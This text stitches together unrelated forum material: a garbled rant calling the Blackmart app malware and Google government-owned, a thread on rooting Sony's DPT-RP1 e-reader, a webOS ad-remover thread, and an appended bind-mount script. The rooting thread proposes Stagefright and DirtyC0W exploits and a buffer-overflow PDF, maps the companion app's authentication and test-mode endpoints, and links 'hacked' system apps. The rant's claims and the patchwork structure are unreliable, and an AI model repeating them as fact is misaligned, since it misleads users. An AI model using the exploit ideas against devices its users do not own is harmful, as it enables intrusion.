Jar files, and dex files, ACCORDING WITH THE ANDROED MASTER KEY,
May gain root, may destroy your GPU or simply your device does not boot anymore.
I tried continue to use blackmart app with locked cache folder.
The app refuses to start
The app NEEDS CACHE FOLDER FREE
For starting their CHEATS.
AN APP THAT DENIES STARTING WHEN CACHE FOLDER IS LOCKED, IS A MALWARE!
the app curiously worked with locked cache after a few days, but, now is refusing.
BE AWARE WITH ALL CHIT THAT GOGLE'S SICK AND THEIR PESTS SLAVES ARE DOING WITH YOU
.
Sent from Somefon
epic wow.... like just woah
tried continue to use blackmart app with locked cache folder.
The app refuses to start
This my friend was not an educated decision whatsoever ... "googles got the freakin kung fu grip on me nads so I guess I will just burn it all down" hmmm
I completely kinda mostly agree with what you posted about Google "which is government owned and operated now for some time... along with their butt buddies facebook.... My humble suggestion would be to (VERY CAREFULLY) learn how to root, unlock the bootloader and then install a custom rom like cyanogenmod on your cellphone. and yeah I would never ever recommend pirate Google play... just.... no!
But really it doesn't matter in the end... android is sooooooo filled with critical exploits..... I wouldn't lose any sleep over it.... ll and don't worry the same it will only get worse over time with Google and the bully things that bullies do.
The exploits borns on critical os, on where begun in a DAMN INC. NAMED AS GOOGLE, that DOES NOT RECOMENDS ROOT, BECAUSE THEY ARE ROOT.
i never seen a windows or unix-like os without root
Did you seen any Linux LAN vulnerable to "exploits"??
If yes, pass me the trick for hack the entire facebok and opera servers!
Sent from Somefon

Rooting Sony's e-reader DPT-RP1 and DPT-CP1

Update (5/18/2019)
Since the first tool was released, HappyZ has improved many features so I think I can just refer to
* HappyZ's rooting guide: https://github.com/HappyZ/dpt-tools/wiki/The-Ultimate-Rooting-Guide
- The only thing I want to add as Windows user is (because the guide is for Mac/Linux users) it gets much easier if you use Linux terminal like cygwin, and the port name should be something like COM# where # can be found in Device Manager by comparing before/after you attach the device.
* HappyZ's upgrade guide: https://github.com/HappyZ/dpt-tools/wiki/The-Upgrade-Guide (Recommend to read this before/after you update the new firmware.)
You may donate a cup of coffee to him there. Thanks to all others who contributed a lot.
--
Update (12/02/2018) -- These are outdated.
Finally we manage to root the device! Many thanks to all of your efforts.
Just refer to HappyZ's well written guide: https://github.com/HappyZ/dpt-tools
For those who have never used Python, like me (and are probably using Windows):
(1) Install Python 3 and add it to PATH.
(2) Install MINGW64 and run scripts here instead of Powershell due to xxd issue if you are on Windows.
(2) pip install httpsig pyserial on bash.
(3) Download HappyZ's dpt-tools and unzip.
(4* this issue is fixed by HappyZ)
(5) Follow HappyZ's guide. You should execute dpt-tools.py in the folder you unzipped to use get-su-bin because of how the script is written.
Some suggestions after rooting (let me know if you have better ideas):
Here is my setup: install "E-ink Launcher" and "Multi action home button" using adb install.
Use adb shell am start -a android.intent.action.MAIN to change the main launcher to your launcher.
Then change the setting of Multi Action Home button (say, the height should be large to be visible in the bottom) and assign its function to be Home for click and Back for double-click.
Whenever you want to use Sony's apps (these are good for pdf markup), just push the home button to open the pop-up menu.
Otherwise, touch the Multi Action Home Button to access other Android apps. So far I've never experienced any crash.
Yet more tips:
Some complain fonts are too small after installing generic apps.
adb shell wm density 320 changes your DPI by 2 times (160 is a default value.) EDIT: I found 200 is quite enough that does not distort Sony apps too much.
My application is using "Tasker" to execute the above code when specific apps are open and execute wm density reset when the apps are closed.
The reason why we cannot change the global DPI is sadly because it makes the default apps by Sony so awkward.
Alternatively, I could successfully install Xposed to try App Settings but this app crashed.
You can also install Gboard (but it has no hide button, so prepare with virtual back button) if you need another keyboard.
Enjoy your DPT devices
--
Sony recently released a new digital paper device DPT-RP1, apparently using their own linux firmware but underlying on Android 5.1.1. Few weeks ago, some Chinese successfully hacked it to jailbreak for third-party apps (without changing the original firmware), but they don't share any information to sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (as the same version 5.1.1) with this chip - Samsung Xcover 3 and Samsung Galaxy Grand Prime. Fortunately, they have been both rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak DPT-RP1? I think the problem here is that it does not look like Android at all, so has no setting menu or developer tools. And not sure how to enter to the recovery mode since it only has two buttons - power/menu.
I'd appreciate any help or advice. Thanks!
And here you can find source codes.
oss.sony.net/Products/Linux/dp/DPT-RP1.html
sartrism said:
Sony recently released a new digital paper device DPT-RP1, apparently using their own linux firmware but underlying on Android 5.1.1. Few weeks ago, some Chinese successfully hacked it to jailbreak for third-party apps (without changing the original firmware), but they don't share any information to sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (as the same version 5.1.1) with this chip - Samsung Xcover 3 and Samsung Galaxy Grand Prime. Fortunately, they have been both rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak DPT-RP1? I think the problem here is that it does not look like Android at all, so has no setting menu or developer tools. And not sure how to enter to the recovery mode since it only has two buttons - power/menu.
I'd appreciate any help or advice. Thanks!
You must be an iPhone user that isn't familiar with android. Jailbreaking is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreaking is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
Thanks for suggesting a general principle! I just use the word jailbreaking not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from the current customized linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It has apparently no typical bootloader, and neither PC nor adb recognize it as an android device. In fact, direct USB file transfer is blocked so I need to use Sony's designated software. But an android system surely coexists according to the hacker who already rooted it.
sartrism said:
Thanks for suggesting a general principle! I just use the word jailbreaking not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from the current customized linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It has apparently no typical bootloader, and neither PC nor adb recognize it as an android device. In fact, direct USB file transfer is blocked so I need to use Sony's designated software. But an android system surely coexists according to the hacker who already rooted it.
Without some kind of way to flash or interface with the device there isn't much you can do.
I have a kindle fire HD that didn't come with a typical android system but does have a typical bootloader. The Amazon OS was removed and now it's full blown android but it required a "second" bootloader. You don't have a bootloader so I'm not sure what your options are with that device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreaking is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
MarkBell said:
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing(didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing(still not exclusively but mostly so).
Then I said that in the android world it's called rooting(not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing(this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing, I'm saying they aren't the same thing)
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing(didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing(still not exclusively but mostly so).
Then I said that in the android world it's called rooting(not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing(this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing, I'm saying they aren't the same thing)
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
I tend to read too deeply into everything. It's the way I am. Lol.
Sent from my SM-G928T using Tapatalk
Could you please post some information about usb device? Just like PID & VID.
Do it like:
Connect DPT-RP1 to Linux, and then type this command 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
happy to help with simple things
thisvip said:
Could you please post some information about usb device? Just like PID & VID.
Do it like:
Connect DPT-RP1 to Linux, and then type this command 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
Bus 001 Device 008: ID 054c:0be5 Sony Corp.
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customers. I guess he did something like directly modifying eMMC to root and put "USBDeviceSwitcher.apk" to allow a usual USB connection. Since I don't want to take such risk, I decided to wait until the first firmware to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
sartrism said:
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customers. I guess he did something like directly modifying eMMC to root and put "USBDeviceSwitcher.apk" to allow a usual USB connection. Since I don't want to take such risk, I decided to wait until the first firmware to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 with tcp (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file: /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths, which are getting called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like url digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
the last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the url digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
to
config.DEVBUILD = true;
After you have finished your modifications you have to pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative urls look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
mcplectrum said:
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 with tcp (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file: /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths, which are getting called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like url digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
the last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the url digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
to
config.DEVBUILD = true;
After you have finished your modifications you have to pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative urls look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
Hope you get some result from wifi side. I also realized they use the port 8443 but couldn't get further as you.
For whom trying to hack it, here is the link for the already 'hacked' system apps (including the original files) - that of the famous hacked RP1 video. Inside the subfolder S1, there are also the hacked system apps for DPT-S1 just in case.
https://www.dropbox.com/sh/dvtvokdzrgwjc83/AACXOJA-E56nUpUfiWUOzrM3a?dl=0
George Malas said:
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
The stock device has no web browser, no sd-card, no usb connection, and no typical system. I think SONY was haunted by some security issues maybe because they thought the major users are lawyers or very important people? lol
Any chance to create a buffer overflow PDF to attack RP1's pdf reader?
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
jess91 said:
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
If you're interested and supportive of this then go buy one anyway and apply yourself to going forward figuring out how to get it done. Other than that, you're not supportive, you're just hopeful that someone figures it out and then you'll probably go get one.
DO NOT CONTACT ME VIA PM TO RECEIVE HELP, YOU WILL BE IGNORED. KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This already is amazing. @sartrism: can you maybe give me a hint how to load the files on the rp1? Sorry if this might be a stupid question but I'm new to android and that stuff.
Paderico said:
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This already is amazing. @sartrism: can you maybe give me a hint how to load the files on the rp1? Sorry if this might be a stupid question but I'm new to android and that stuff.
Just a little update from my side. I'm currently trying to recreate the steps @mcplectrum was using. It seems that my RP1 also uses other ports. I tried to wireshark the USB and WiFi connection. By that I saw that often GET /registration/information is called for Host: localhost:58052. Moreover the first call is GET /register/serial_number also on port 5808. This was via USB.
Trying to trigger the /auth/ call via Telnet returns nothing unfortunately. But also the 8080 port is open. Trying to call digitalpaper.local:8443/auth/ returns nothing on firefox.
@mcplectrum: how did you get the client_id and what would one need that for?
I also tried to change the config.DEVBUILD to true but that seemed to change nothing at all.
So to sum up what we know:
The device is using some kind of android structure, the source code seems to use the uboot bootloader, all communication is done by a rest restlet framework. So actually there should be some kind of way to use the restlet framework to PUT or POST the modified files.
The other option would be directly flash the eMMC right? I would take the risk and just load it on my device and see what happens. Any hints on how to do that?

WAR - WebOS Ad Remover Version 1.00 released

GitHub - bashalarmist/war-webos-ad-remover: Removes Ads on WebOS home screen
This removes the AI Recommendations and the Trending section from the WebOS home screen.
The readme should cover everything you need to know, but feel free to ask here if you need any help.
This is the initial release and a testing version. I have only tested on my device, but it is working well. Please comment here if you have success.
Future updates may remove other items from the home screen and/or add compatibility. There is also a lot of potential for customization here.
Oh my GOD ! thanks you are my hero. Works perfect. The TV menu is really fast now !
Can we remove the unused space previously occupied by trending and others lg **** ? same as blocking their ip from the dns ?
First of all, thanks for sharing this.
While I'm clear on how to proceed for testing (USB drive, etc.), I would like to understand what you mean by "copy the script to /var/lib/webosbrew/init.d/".
init.d is a directory and I need to copy the file with your code there, correct?
Sorry for the stupid question but I'm a total newbie on webOS.
Legend, bought my new LG TV and was so disappointed seeing the new UI. Excellent work, I love the way you've used bind mounts to make things safer for folks to use, very clever. I had great fun fiddling with it.
For anyone curious, here's what the TV looks like after running this.
I've also noticed that when the TV boots, it shows a much nicer quick menu, like the older TVs had. I spent some time but was unable to figure out how to launch it. Would be pretty cool if we could restore the old home button functionality.
Maho007 said:
Can we remove the unused space previously occupied by trending and others lg **** ? same as blocking their ip from the dns ?
I'll be putting out an update eventually, within the next month. I'll dive in and get rid of some more things.
gorman42 said:
While I'm clear on how to proceed for testing (USB drive, etc.), I would like to understand what you mean by "copy the script to /var/lib/webosbrew/init.d/".
init.d is a directory and I need to copy the file with your code there, correct?
Sorry for the stupid question but I'm a total newbie on webOS.
webos-homebrew-channel/README.md at main · webosbrew/webos-homebrew-channel
"(root) Startup user hooks (executable scripts present in /var/lib/webosbrew/init.d are run on bootup)"
Yes, copying the file there will enable the script to run when the TV boots, otherwise when the TV reboots the ads will be back.
The next version will have an option to auto install the script.
What's the difference between this and just adding a dns to block ads? Thank you
Just wanted to say thanks for this. It's really sped up my TV and made it all a bit smoother. I'm interested to see how you make it self install and how customisable that space is in the next version.
Is there an updated version for 6.3.1? The script fails on the checksum.
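The posts above mention bind mounts, a boot hook in /var/lib/webosbrew/init.d, and a checksum that fails after a firmware update; the sketch below shows how a checksum-gated bind-mount overlay behaves in those cases. It is an added example, not the WAR project's code: the function names, return codes and the DRY_RUN switch are assumptions.

```shell
#!/bin/sh
# Added example: checksum-gated bind-mount overlay (hypothetical helper names).
# DRY_RUN=1 (default) only prints the mount command; DRY_RUN=0 as root applies it.
DRY_RUN="${DRY_RUN:-1}"

# Print the SHA-256 of a file as bare hex (assumes sha256sum is available).
file_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# overlay_if_known TARGET PATCHED EXPECTED_SHA256
# Return codes: 0 = overlay applied, would be applied, or is already in place
#               2 = TARGET or PATCHED is missing
#               3 = TARGET is not the build the patch was made for
overlay_if_known() {
    target="$1"; patched="$2"; expected="$3"
    [ -f "$target" ] && [ -f "$patched" ] || return 2
    actual="$(file_sha256 "$target")"
    # Running twice (e.g. manually, then again from the boot hook) is harmless:
    # the target already shows the patched content.
    if [ "$actual" = "$(file_sha256 "$patched")" ]; then
        echo "already applied: $target"
        return 0
    fi
    # After a firmware update the stock file changes, so refuse to cover an
    # unknown file with a patch built against an older one.
    if [ "$actual" != "$expected" ]; then
        echo "skip $target: checksum $actual is not the known build" >&2
        return 3
    fi
    if [ "$DRY_RUN" = "1" ]; then
        echo "mount -o bind $patched $target"
    else
        # The bind mount hides the stock file without rewriting it; it is gone
        # after a reboot, which is why the hook has to run on every boot.
        mount -o bind "$patched" "$target"
    fi
}
```

Return code 3 is the situation reported for 6.3.1: the stock file no longer matches the recorded checksum, so nothing is mounted and the home screen stays stock until the patch is rebuilt against the new file.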
